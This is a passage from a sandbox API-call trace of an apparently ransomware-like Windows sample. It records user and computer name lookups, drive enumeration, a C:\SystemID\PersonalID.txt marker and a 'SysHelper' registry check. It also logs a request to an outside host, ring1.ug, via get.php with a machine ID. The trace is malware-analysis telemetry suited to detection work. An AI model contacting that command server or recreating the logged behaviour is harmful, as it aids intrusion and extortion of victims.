hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6640 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322f058 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322f0b0 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f65b0 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3213538 | out: hHeap=0x6e0000) returned 1 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x28) returned 0x322d8f8 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x32239a8 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3223c10 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3223e78 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x32240e0 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3224348 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x32245b0 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3224818 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3224a80 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3228e48 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x32290b0 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa0) returned 0x7597e8 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x130) returned 0x31d0ab8 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7597e8 | out: hHeap=0x6e0000) returned 1 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1d0) returned 0x3213538 [0145.377] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31d0ab8 | out: hHeap=0x6e0000) returned 1 [0145.377] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x2b7) returned 0x74cf80 [0145.377] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3213538 | out: hHeap=0x6e0000) returned 1 [0145.377] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x412) returned 0x74eea8 [0145.377] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x74cf80 | out: hHeap=0x6e0000) returned 1 [0145.377] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x61a) returned 0x32042e8 [0145.377] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x74eea8 | out: hHeap=0x6e0000) returned 1 [0145.377] GetUserNameW (in: lpBuffer=0x18da80, pcbBuffer=0x18d8f4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d8f4) returned 1 [0145.378] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x590) returned 0x74eea8 [0145.378] GetLastError () returned 0x0 [0145.380] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d5e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c0 [0145.382] GetFileType (hFile=0x5c0) returned 0x1 [0145.382] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1000) returned 0x3241648 [0145.382] ReadFile (in: hFile=0x5c0, lpBuffer=0x3241648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d650, lpOverlapped=0x0 | out: lpBuffer=0x3241648*, lpNumberOfBytesRead=0x18d650*=0x2a, lpOverlapped=0x0) returned 1 [0145.383] GetLastError () returned 0x0 [0145.383] ReadFile (in: hFile=0x5c0, lpBuffer=0x3241648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d650, lpOverlapped=0x0 | out: lpBuffer=0x3241648*, lpNumberOfBytesRead=0x18d650*=0x0, lpOverlapped=0x0) returned 1 [0145.383] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x7272e8 [0145.383] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3241648 | out: hHeap=0x6e0000) returned 1 [0145.383] CloseHandle (hObject=0x5c0) returned 1 [0145.383] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 0 [0145.383] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18d5e8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c0 [0145.384] GetFileType (hFile=0x5c0) returned 0x1 [0145.384] GetLastError () returned 0xb7 [0145.389] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.389] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0145.389] RegisterClassExW (param_1=0x18d860) returned 0xc12b [0145.389] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x20164 [0145.398] NtdllDefWindowProc_W () returned 0x0 [0145.399] NtdllDefWindowProc_W () returned 0x1 [0145.400] NtdllDefWindowProc_W () returned 0x0 [0145.402] NtdllDefWindowProc_W () returned 0x0 [0145.403] ShowWindow (hWnd=0x20164, nCmdShow=0) returned 0 [0145.403] UpdateWindow (hWnd=0x20164) returned 1 [0145.403] GetLogicalDrives () returned 0x4 [0145.403] SetErrorMode (uMode=0x1) returned 0x0 [0145.403] PathFileExistsA (pszPath="C:\\") returned 1 [0145.403] SetErrorMode (uMode=0x0) returned 0x1 [0145.403] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0145.403] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x806) returned 0x32063e0 [0145.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d818, cbMultiByte=-1, lpWideCharStr=0x32063e0, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0145.403] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x3241648 [0145.403] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32063e0 | out: hHeap=0x6e0000) returned 1 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x7272e8 [0145.404] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3241648 | out: hHeap=0x6e0000) returned 1 [0145.404] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7272e8 | out: hHeap=0x6e0000) returned 1 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x7272e8 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x10) returned 0x320b590 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x8ec) returned 0x32063e0 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x3241648 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3262b18 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1070) returned 0x3218638 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbf70 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x32196b0 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x660) returned 0x3214830 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x32633a0 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x3263c28 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x32644b0 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x3264d38 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x32655c0 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x3241e60 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3265e48 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x32666d0 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x326dd38 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x326e580 [0145.404] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x326ede8 [0145.405] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3266f58 [0145.405] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x32677e0 [0145.405] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x326f650 [0145.405] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x326fe98 [0145.405] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x3268068 [0145.405] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x32688f0 [0145.405] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x3269178 [0145.405] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3269a00 [0145.405] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x326a288 [0145.405] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x32706f8 [0145.406] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x3270f80 [0145.406] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x3271808 [0145.406] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3272090 [0145.406] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3272918 [0145.406] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x32806e0 [0145.406] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3280f48 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x32731a0 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3273a28 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x32742b0 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x32817b0 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x3281ff8 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x3274b38 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x32753c0 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x3275c48 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x32764d0 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3276d58 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x32775e0 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x3277e68 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x32786f0 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3278f78 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3282840 [0145.407] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x32830a8 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3279800 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x327a088 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x327a910 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x3283910 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x327b198 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x327ba20 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x327c2a8 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x327cb30 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x327d3b8 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x327dc40 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x327e4c8 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x327ed50 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x327f5d8 [0145.408] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3284170 [0145.409] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3294158 [0145.409] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x32949c0 [0145.409] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x32849f8 [0145.409] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3285280 [0145.409] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x3285b08 [0145.409] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x3286390 [0145.409] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x3286c18 [0145.409] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x32874a0 [0145.409] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x3287d28 [0145.409] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x32885b0 [0145.409] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3288e38 [0145.409] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc0) returned 0x3208908 [0145.409] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x32896c0 [0145.410] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x3295228 [0145.410] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x3295a40 [0145.410] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x3289f48 [0145.410] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328a7d0 [0145.410] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328b058 [0145.410] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328b8e0 [0145.410] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328c168 [0145.410] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbd68 [0145.410] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328c9f0 [0145.410] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328d278 [0145.410] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328db00 [0145.410] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328e388 [0145.410] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x32063e8, dwCreationFlags=0x0, lpThreadId=0x320b598 | out: lpThreadId=0x320b598*=0x35c) returned 0x3a0 [0145.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x644) returned 0x398 [0145.411] GetMessageW (lpMsg=0x18da10, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) [0148.390] NtdllDefWindowProc_W () returned 0x0 [0158.251] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329c260 [0158.251] GetComputerNameW (in: lpBuffer=0x329c260, nSize=0x18cd8c | out: lpBuffer="XDUWTFONO", nSize=0x18cd8c) returned 1 [0158.251] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407d0 [0158.251] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329c260 | out: hHeap=0x6e0000) returned 1 [0158.251] IsWindow (hWnd=0x20164) returned 1 [0158.251] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407d0 | out: hHeap=0x6e0000) returned 1 [0244.977] NtdllDefWindowProc_W () returned 0x1 [0262.323] NtdllDefWindowProc_W () returned 0x1 Thread: id = 191 os_tid = 0x6d4 Thread: id = 192 os_tid = 0x6d8 Thread: id = 193 os_tid = 0x6dc Thread: id = 194 os_tid = 0x6e0 Thread: id = 195 os_tid = 0x6e4 Thread: id = 196 os_tid = 0x6ec Thread: id = 281 os_tid = 0x5b4 Thread: id = 282 os_tid = 0x630 Thread: id = 328 os_tid = 0x368 [0144.718] timeGetTime () returned 0x113421b [0144.718] GetLastError () returned 0x54f [0144.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x3bc) returned 0x3213120 [0144.719] GetCurrentThreadId () returned 0x368 [0144.719] SetLastError (dwErrCode=0x54f) [0144.719] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x98da5e4 | out: phkResult=0x98da5e4*=0x5a4) returned 0x0 [0144.719] RegQueryValueExW (in: hKey=0x5a4, lpValueName="SysHelper", lpReserved=0x0, lpType=0x98da5d8, lpData=0x98da5e0, lpcbData=0x98da5dc*=0x4 | out: lpType=0x98da5d8*=0x4, lpData=0x98da5e0*=0x1, lpcbData=0x98da5dc*=0x4) returned 0x0 [0144.719] RegCloseKey (hKey=0x5a4) returned 0x0 [0144.719] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x98da4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0144.719] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0144.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x727848 [0144.719] AreFileApisANSI () returned 1 [0144.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98da4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0144.721] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x7a) returned 0x741978 [0144.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98da4e4, cbMultiByte=-1, lpWideCharStr=0x741978, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0144.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x98da368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a4 [0144.722] GetFileType (hFile=0x5a4) returned 0x1 [0144.722] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x741978 | out: hHeap=0x6e0000) returned 1 [0144.722] SetFilePointerEx (in: hFile=0x5a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x98da418 | out: lpNewFilePointer=0x0) returned 1 [0144.722] SetFilePointerEx (in: hFile=0x5a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x98da410 | out: lpNewFilePointer=0x0) returned 1 [0144.722] SetFilePointerEx (in: hFile=0x5a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x98d93f4 | out: lpNewFilePointer=0x0) returned 1 [0144.722] SetFilePointerEx (in: hFile=0x5a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x98d93ec | out: lpNewFilePointer=0x0) returned 1 [0144.722] SetFilePointerEx (in: hFile=0x5a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x98da434 | out: lpNewFilePointer=0x0) returned 1 [0144.722] SetFilePointerEx (in: hFile=0x5a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x98da42c | out: lpNewFilePointer=0x0) returned 1 [0144.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1000) returned 0x32134e8 [0144.723] ReadFile (in: hFile=0x5a4, lpBuffer=0x32134e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x98da3c4, lpOverlapped=0x0 | out: lpBuffer=0x32134e8*, lpNumberOfBytesRead=0x98da3c4*=0x22e, lpOverlapped=0x0) returned 1 [0144.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32134e8 | out: hHeap=0x6e0000) returned 1 [0144.723] CloseHandle (hObject=0x5a4) returned 1 [0144.724] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x98da670 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0144.724] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0144.724] DeleteFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt")) returned 1 [0144.725] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x98da4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0144.725] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0144.725] AreFileApisANSI () returned 1 [0144.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98da4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0144.725] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x7a) returned 0x741978 [0144.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98da4e4, cbMultiByte=-1, lpWideCharStr=0x741978, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0144.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x98da368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.725] GetLastError () returned 0x2 [0144.725] GetLastError () returned 0x2 [0144.725] SetLastError (dwErrCode=0x2) [0144.725] GetLastError () returned 0x2 [0144.725] SetLastError (dwErrCode=0x2) [0144.725] GetLastError () returned 0x2 [0144.725] SetLastError (dwErrCode=0x2) [0144.725] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x741978 | out: hHeap=0x6e0000) returned 1 [0144.725] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0144.725] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x80) returned 0x741978 [0144.725] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x74ab90 [0144.726] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x32134e8 [0144.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x74ab90, cbMultiByte=-1, lpWideCharStr=0x32134e8, cchWideChar=1056 | out: lpWideCharStr="D91AFC29D86891EC47704F29B0260BE8") returned 33 [0144.726] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x850) returned 0x3213d30 [0144.726] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32134e8 | out: hHeap=0x6e0000) returned 1 [0144.726] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x74ab90 | out: hHeap=0x6e0000) returned 1 [0144.726] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x8c0) returned 0x3214588 [0144.726] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x741978 | out: hHeap=0x6e0000) returned 1 [0144.726] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3213d30 | out: hHeap=0x6e0000) returned 1 [0144.726] lstrcpyW (in: lpString1=0x98daf78, lpString2="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php?pid=D91AFC29D86891EC47704F29B0260BE8" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php?pid=D91AFC29D86891EC47704F29B0260BE8") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php?pid=D91AFC29D86891EC47704F29B0260BE8" [0144.726] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php?pid=D91AFC29D86891EC47704F29B0260BE8", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0145.148] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x98da778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x98da604 | out: lpBuffer=0x98da778*, lpdwNumberOfBytesRead=0x98da604*=0x22e) returned 1 [0145.149] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x98da670 | out: 